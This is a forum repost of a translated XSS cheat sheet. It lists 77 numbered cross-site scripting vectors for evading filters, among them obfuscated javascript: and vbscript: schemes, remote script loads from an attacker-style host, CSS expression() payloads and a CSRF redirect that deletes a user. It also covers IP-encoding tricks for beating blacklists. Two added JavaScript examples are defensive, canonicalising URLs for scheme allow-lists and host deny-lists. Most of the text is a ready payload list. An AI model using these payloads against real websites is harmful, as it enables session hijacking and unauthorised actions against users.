It seems t00ls has fairly little material on XSS; I saw something good and copied it over, not sure whether anyone needs to bookmark it.
Note: the numbered list below is the RSnake XSS cheat sheet in Chinese translation. Many of the vectors (IMG SRC=javascript:, DYNSRC/LOWSRC, BGSOUND, vbscript:, HTC behaviours, CSS expression()) only worked in IE 6/7-era browsers. The forum software also rewrote eval( as eval_r( and expression( as expression_r( and replaced straight quotes with typographic ones; those are restored here.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: directive (the copy repeated the payload from (1); the IMG form that the heading describes is)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive scheme
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML decimal character references for the scheme (with semicolons; (9) shows that they are not actually required). The copy showed the references already decoded; the decimal references for "javascript:" are
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (no quotes of any kind needed; use the XSS calculator to generate the codes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (XSS calculator); the payload was omitted in the original copy
<IMG SRC=jav...omitted...S')>

(9) Long, 7-digit zero-padded Unicode encoding without semicolons (XSS calculator); payload omitted in the original copy. Filters that look for "&#XX;" miss this because a numeric character reference does not need the trailing semicolon and may be zero-padded.
<IMG SRC=jav...omitted...S')>

(10) Hex encoding, also without semicolons (XSS calculator); payload omitted in the original copy
<IMG SRC=java...omitted...XSS')>

(11) Embedded tab to break up the javascript: directive (a literal TAB between "jav" and "ascript"; the copy flattened it to a space)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab (the copy flattened the reference to a space; the heading names the character)
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript, the extreme XSS example: the original spreads the directive over many lines of encoded whitespace, which the browser strips; the copy here shows only the collapsed form
<IMG SRC="javascript:alert('XSS')">
(16) Working around a length limit (all the fragments must be on the same page; the string is assembled and then eval'd)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character (generated with perl because a NUL byte cannot be typed; relied on old browser parsers that skipped the NUL)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (in practice the null-byte trick has been almost useless here, since there is nowhere it can be exploited)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: directive in an IMG (leading whitespace and control characters are stripped before the scheme is matched)
<IMG SRC=" javascript:alert('XSS');">
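The IMG vectors in (3) through (19) all hide the same javascript: scheme behind case changes, numeric character references and embedded whitespace. The following is an added example, not part of the original post or of the cheat sheet it copies: it entity-decodes an attribute value and runs it through Node's WHATWG URL parser, which is what the browser effectively does before it matches the scheme, and contrasts that with a naive substring blacklist. The base origin https://example.test/, the sample vectors and the deliberately partial named-entity table are constructed for the demo.

```javascript
// Added example (not from the original post): normalise a URL-bearing HTML
// attribute the way the browser does before the scheme is matched, so a
// filter can be checked against the obfuscated javascript: forms above.
// Assumptions: Node's global WHATWG URL parser, a made-up base origin
// https://example.test/ for resolving relative links, and a named-entity
// table limited to the handful of names used here.

// Subset of the HTML named character references (constructed; a real
// decoder needs the full table, and &colon; is itself a known bypass).
const NAMED_ENTITIES = {
  colon: ":", Tab: "\t", NewLine: "\n", lt: "<", gt: ">",
  quot: '"', amp: "&", apos: "'",
};

// Decode numeric (&#106; &#0000106 &#x6A) and the named references above.
// The trailing semicolon is optional, which is exactly what the
// "no semicolons" vectors (9) and (10) rely on.
function decodeEntities(text) {
  return text.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] !== "#") {
      return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body)
        ? NAMED_ENTITIES[body]
        : whole;
    }
    const cp = body[1] === "x" || body[1] === "X"
      ? parseInt(body.slice(2), 16)
      : parseInt(body.slice(1), 10);
    return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

const BASE = "https://example.test/"; // constructed base origin (assumption)
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// What a naive blacklist does: look for the literal, case-insensitive
// "javascript:" in the raw attribute value.
function naiveBlacklistBlocks(raw) {
  return /javascript:/i.test(raw);
}

// What the browser effectively does: entity-decode the attribute, then run
// the URL parser, which strips leading/trailing C0 controls and spaces,
// removes every embedded TAB/LF/CR and lower-cases the scheme. Returns the
// decoded value, the scheme the browser would act on, and whether an
// allow-list filter (http/https only) would accept it.
function checkUrlAttribute(raw) {
  const decoded = decodeEntities(raw);
  let protocol;
  try {
    protocol = new URL(decoded, BASE).protocol;
  } catch {
    protocol = null; // not even a relative URL: fail closed
  }
  return { decoded, protocol, allowed: protocol !== null && ALLOWED_SCHEMES.has(protocol) };
}

// Vectors from the sheet above (constructed copies for the demo).
const SAMPLES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "jav&#x09;ascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  " javascript:alert('XSS');",
  "javascript&colon;alert('XSS')",
  "vbscript:msgbox(\"XSS\")",
  "http://3w.org/XSS/xss.js",
  "//www.google.com/",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const raw of SAMPLES) {
    const r = checkUrlAttribute(raw);
    console.log(
      `${r.allowed ? "allow" : "BLOCK"}  naive=${naiveBlacklistBlocks(raw) ? "blocks" : "PASSES"}` +
      `  scheme=${r.protocol}  ${JSON.stringify(raw)}`,
    );
  }
}
```

Run it with node and compare the two columns: every entity-encoded, tab-split or &colon; form sails past the substring blacklist but comes out of the parser as scheme javascript:. The lesson is the one the sheet keeps making: canonicalise first, then allow-list the scheme, never pattern-match the raw bytes.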
(20) Non-alpha-non-digit XSS (the parser treats a non-alphanumeric character after the tag name as ending it, so "SCRIPT/XSS" is still a script tag)
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (the regex literal /XSS/ supplies the string through .source; the line break stands in for the semicolon)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes (breaking out of a string the application wrote into a script block)
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image (the copy dropped the TYPE attribute, without which SRC is ignored)
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (the copy lost the onload handler, leaving "<BODY('XSS')>")
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC (IE only)
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC (IE only)
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND (IE only)
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet via LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript (IE only; the copy had the tail of (39) pasted onto this line)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image plus extra characters: IE accepted any character with decimal code 1-32, 34, 39, 160, 8192-8193, 12288 or 65279 between the opening parenthesis and javascript:, so a filter keyed on "url(javascript" misses it (the copy shows the payload without the extra character)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression (IE's CSS expression())
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with expression (in the original sheet the word "expression" is split with a /*comment*/; the copy shows it intact)
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything starting with "<" and a letter is parsed as a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of the payload survived the copy; the original uses comments and encoding to split the word)
exppression(alert("XSS"))'>

(53) STYLE background (the copy had a stray extra <STYLE> in front)
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: a Flash movie can be embedded that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash movie can smuggle in the XSS
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace with an HTC behaviour (IE only; the .htc file must be on the same server as the page carrying the XSS)
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If ".js" is filtered, serve the script under an image extension: the browser executes whatever SCRIPT SRC returns, whatever the file name says (the copy lost the URL)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands: the image URL makes the victim's browser send a GET request to the target site with the victim's cookies attached, so any state-changing GET action runs as the victim. This is cross-site request forgery riding on the injection, not arbitrary command execution.
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands 2: a.jpg lives on a server you control and an Apache .htaccess rule redirects the image request to the admin action on the target
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) HTML quote encapsulation, for filters that allow <SCRIPT> but block "<script src" with a regex along the lines of /<script[^>]+src/i (tested in IE; results vary by browser)
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) The opening tag is written out by an earlier script, so the literal "<SCRIPT SRC" never appears in the page
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL string evasion (when the hostname itself is blacklisted): use the IP address instead
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the original percent-encodes the hostname; the copy shows it already decoded)
<A HREF="http://3w.org">XSS</A>

(70) Dword (decimal) IP: 3232235521 is 192.168.0.1
<A HREF="http://3232235521">XSS</A>

(71) Hex IP (the copy rendered 0x00 and 0x01 with a multiplication sign)
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: a newline and tabs inside the URL (which browsers strip) plus octal, hex and decimal octets; resolves to 66.102.7.147 (the copy flattened the tabs to spaces)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Omit the protocol
<A HREF="//www.google.com/">XSS</A>

(75) Omit www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
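Items (68) through (76) are all one trick: the link points at the same host, spelled so that a string comparison against a deny list fails. The following is an added example, not part of the original post or of the cheat sheet it copies: it parses the IPv4 notations by hand (hex, octal, decimal, and fewer than four parts) the way the WHATWG URL standard specifies, and lets Node's URL parser strip the embedded tabs and newlines and resolve the protocol-relative form, so that every variant canonicalises to one hostname before the deny list is consulted. The base origin https://example.test/, the sample links and the deny list are constructed for the demo.

```javascript
// Added example (not from the original post): canonicalise the host part of
// the obfuscated links in (68)-(76) so a hostname/IP deny list cannot be
// dodged by dword, hex, octal or mixed-radix IPs, embedded tabs/newlines,
// protocol-relative links or a trailing dot. Assumes Node's global WHATWG
// URL parser and a made-up base origin https://example.test/.

// Parse one IPv4 literal by the WHATWG URL rules: each dot-separated part is
// hex (0x..), octal (leading 0) or decimal; with fewer than four parts the
// last one fills the remaining bytes. Returns dotted decimal, or null when
// the string is not an IPv4 literal (i.e. it is a DNS name or malformed).
function parseIPv4Literal(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop(); // trailing dot
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = [];
  for (const p of parts) {
    let n;
    if (/^0[xX][0-9a-fA-F]*$/.test(p)) {
      n = p.length === 2 ? 0 : parseInt(p.slice(2), 16);
    } else if (/^0[0-9]+$/.test(p)) {
      if (/[89]/.test(p)) return null;     // "08" is not valid octal
      n = parseInt(p.slice(1), 8);
    } else if (/^[0-9]+$/.test(p)) {
      n = parseInt(p, 10);
    } else {
      return null;                          // non-numeric part: a DNS name
    }
    nums.push(n);
  }
  const last = nums.pop();
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let addr = last;
  nums.forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((s) => (addr >>> s) & 255).join(".");
}

const BASE = "https://example.test/"; // constructed base origin (assumption)

// Canonical hostname as the browser would resolve it: TAB/LF/CR removed and
// scheme-relative links resolved by the URL parser, case folded, trailing
// dot dropped, IPv4 literals normalised to dotted decimal.
function canonicalHost(href, base = BASE) {
  let host;
  try {
    host = new URL(href, base).hostname;
  } catch {
    return null;
  }
  host = host.toLowerCase().replace(/\.$/, "");
  return parseIPv4Literal(host) ?? host;
}

// Deny-list check: exact match or subdomain of a listed name, after both
// sides have been canonicalised. Unparsable input is rejected (fail closed).
function hostDenied(href, denyList, base = BASE) {
  const host = canonicalHost(href, base);
  if (host === null) return true;
  return denyList.some((d) => {
    const c = canonicalHost("http://" + d + "/") ?? d;
    return host === c || host.endsWith("." + c);
  });
}

// The links from the sheet above (constructed copies; tabs and the newline
// in the mixed-encoding one are literal, as in the original vector).
const LINKS = [
  "http://3232235521",
  "http://0xc0.0xa8.0x00.0x01",
  "http://0300.0250.0000.0001",
  "h\ntt\tp://6\t6.000146.0x7.147/",
  "//www.google.com/",
  "http://google.com/",
  "http://www.google.com./",
];
const DENY = ["192.168.0.1", "google.com", "66.102.7.147"]; // constructed deny list

if (typeof require !== "undefined" && require.main === module) {
  for (const href of LINKS) {
    console.log(`${hostDenied(href, DENY) ? "DENY " : "allow"}  ${canonicalHost(href)}  <- ${JSON.stringify(href)}`);
  }
}
```

All three spellings of 192.168.0.1 and the mixed-radix 66.102.7.147 collapse to the same dotted-decimal host, and the www, no-www and trailing-dot forms of google.com all hit the one deny-list entry. A filter that compares the raw HREF string against a list sees seven different strings.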